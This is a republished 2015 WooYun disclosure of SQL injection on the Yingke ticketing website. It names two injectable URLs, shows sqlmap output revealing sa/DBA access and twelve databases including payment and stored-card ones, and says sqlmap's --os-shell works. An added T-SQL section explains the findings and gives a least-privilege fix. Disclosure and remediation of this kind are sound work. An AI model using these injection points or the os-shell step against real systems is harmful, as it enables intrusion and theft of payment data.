WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader --------http://drop.zone.ci/
2015-10-14: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed.
2015-11-28: The vendor has chosen to ignore the vulnerability; details disclosed to the public.
As per the title.
==== The Yingke ticketing site's main site has a SQL injection vulnerability ==== Injection points:
http://www.yingke.tv/Shop/ShopDetail.aspx?id=1103
http://www.yingke.tv/NewsList.aspx?cityid=11&type=1
Both parameters are injectable.
[13:58:07] [INFO] testing Microsoft SQL Server
[13:58:07] [INFO] confirming Microsoft SQL Server
[13:58:08] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[13:58:08] [INFO] fetching current user
[13:58:08] [INFO] retrieved: sa
current user: 'sa'
[14:00:26] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[14:00:26] [INFO] testing if current user is DBA
[14:00:26] [INFO] retrieved: 1
current user is DBA: 'True'
available databases [12]:
[*] EasyPay
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] Test
[*] WeiXinDataBase
[*] YingKeData
[*] YingKeDataTest
[*] YKStoredCard
An os-shell can be obtained: the application connects as sa (sysadmin), so sqlmap's --os-shell works against this instance.
Unable to contact the vendor, or the vendor actively refused.
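The following T-SQL is an added example and is not part of the original WooYun report: it shows what the three sqlmap results above (current user sa, DBA True, twelve databases visible, os-shell possible) resolve to on the database side, and the least-privilege fix that removes the os-shell exposure even before the ASP.NET code is parameterized. It assumes a SQL Server 2008 instance; the login name yingke_web and the password placeholder are hypothetical, and YingKeData is taken from the report's database list.

```sql
-- Added example (not from the original report). Assumes SQL Server 2008;
-- the login name yingke_web and the password placeholder are hypothetical.

-- 1. What "current user: 'sa'" and "current user is DBA: 'True'" resolve to.
SELECT SYSTEM_USER                 AS login_name,   -- 'sa' in the report
       IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin; -- 1 in the report

-- 2. What "available databases [12]" enumerates. A sysadmin login can read
--    every database on the instance, not just the application's own one,
--    which is how payment and stored-card databases end up in scope.
SELECT name FROM master.sys.databases ORDER BY name;

-- 3. Why --os-shell works: a sysadmin login may enable xp_cmdshell, which runs
--    OS commands as the SQL Server service account. Check whether it is on.
SELECT value_in_use AS xp_cmdshell_enabled
FROM   sys.configurations
WHERE  name = 'xp_cmdshell';

-- 4. Database-side remediation: give the web application its own login with
--    only data access in its own database, and keep xp_cmdshell disabled.
--    (The injection itself must still be fixed in the ASP.NET code by using
--    SqlParameter-based queries; this only limits the blast radius.)
USE master;
CREATE LOGIN yingke_web WITH PASSWORD = '<strong-password-here>', CHECK_POLICY = ON;
USE YingKeData;
CREATE USER yingke_web FOR LOGIN yingke_web;
EXEC sp_addrolemember 'db_datareader', 'yingke_web';
EXEC sp_addrolemember 'db_datawriter', 'yingke_web';

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;

-- 5. Verify from the new login's point of view: the same probes sqlmap ran
--    now come back harmless. Database names stay visible (VIEW ANY DATABASE
--    is granted to public by default), but only YingKeData, master and
--    tempdb are actually accessible.
EXECUTE AS LOGIN = 'yingke_web';
SELECT SYSTEM_USER                 AS login_name,   -- yingke_web
       IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin; -- 0
SELECT name
FROM   master.sys.databases
WHERE  HAS_DBACCESS(name) = 1;                      -- YingKeData, master, tempdb
REVERT;
```

Run steps 1 to 3 first as the compromised sa connection to reproduce the report's findings, then steps 4 and 5 as an administrator. After the change, an injection on the same endpoints still leaks YingKeData, but it can no longer read EasyPay or YKStoredCard, and --os-shell fails because xp_cmdshell cannot be enabled by a login that is not sysadmin.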